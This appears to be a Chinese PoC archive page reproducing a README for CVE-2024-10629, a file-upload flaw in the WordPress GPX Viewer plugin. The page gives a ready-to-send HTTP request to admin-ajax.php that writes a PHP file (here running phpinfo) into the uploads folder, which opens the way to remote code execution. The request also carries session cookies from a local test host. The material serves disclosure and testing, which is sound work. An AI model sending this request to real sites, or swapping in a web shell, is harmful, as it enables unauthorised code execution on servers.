POC详情: 85250d68d01cc3857182462834438394477abc07

来源
关联漏洞
标题: WordPress plugin GPX Viewer 安全漏洞 (CVE-2024-10629)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin GPX Viewer 2.2.8版本及之前版本存在安全漏洞,该漏洞源于gpxv_file_upload函数中缺少功能检查和文件类型验证。
描述
GPX Viewer <= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation
介绍
# CVE-2024-10629
GPX Viewer &lt;= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation

# Description:
The GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible.


```
Published: 2024-11-12 13:21:00
CVE: CVE-2024-10629
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: gpx-viewer
```

POC
---

Login as a standard user

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=gpx_admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Cookie: tm_member=172.21.0.1; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C2d7486450bf41812303a58d1fbafe518ef19b8073d4e664c09bf94377ca17fe7; _delighted_web={%22FutSOUgy5edCcTk9%22:{%22_delighted_fst%22:{%22t%22:%221694595337803%22}}}; mailpoet_page_view=%7B%22timestamp%22%3A1727811617%7D; wordpress_admin_logged_in=1; LUMISESESSID=TE3CYBG1VFQEDZU5QXW7; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; tk_ai=woo%3A4etnnSH4LBZewXIFkJECnLd0; PHPSESSID=786ef110eb080f5686818c346edde8d3; wp-settings-time-4=1731070503; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D5%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A132.0%29%20Gecko%2F20100101%20Firefox%2F132.0; woocommerce_items_in_cart=1; woocommerce_cart_hash=6d1d20e1fd5e4f4f3846eea4a6c448f3; hashcaf=#layoutstab; hashcafsub=post-layout; wp_woocommerce_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731498720%7C%7C1731495120%7C%7C2c258c1ff57491a59c854505530207f7; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C7e8c9e15242ca5cf7bc38fb82a5a51c0b8024a364cc5b62472935180754b64df; wp-settings-1=m02pzb9ihm%3Dundefined%26libraryContent%3Dbrowse; wp-settings-time-1=1731406964
Upgrade-Insecure-Requests: 1
Priority: u=0, i

action=gpxv_file_upload&category=uncategorized&filename=example.php&gpx=%3c%3fphp%20phpinfo()%3b%3f%3e&update=false&clean=false
```

Goes to `/wp-content/uploads/gpx/uncategorized/example.php`
文件快照

[4.0K] /data/pocs/85250d68d01cc3857182462834438394477abc07 └── [3.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。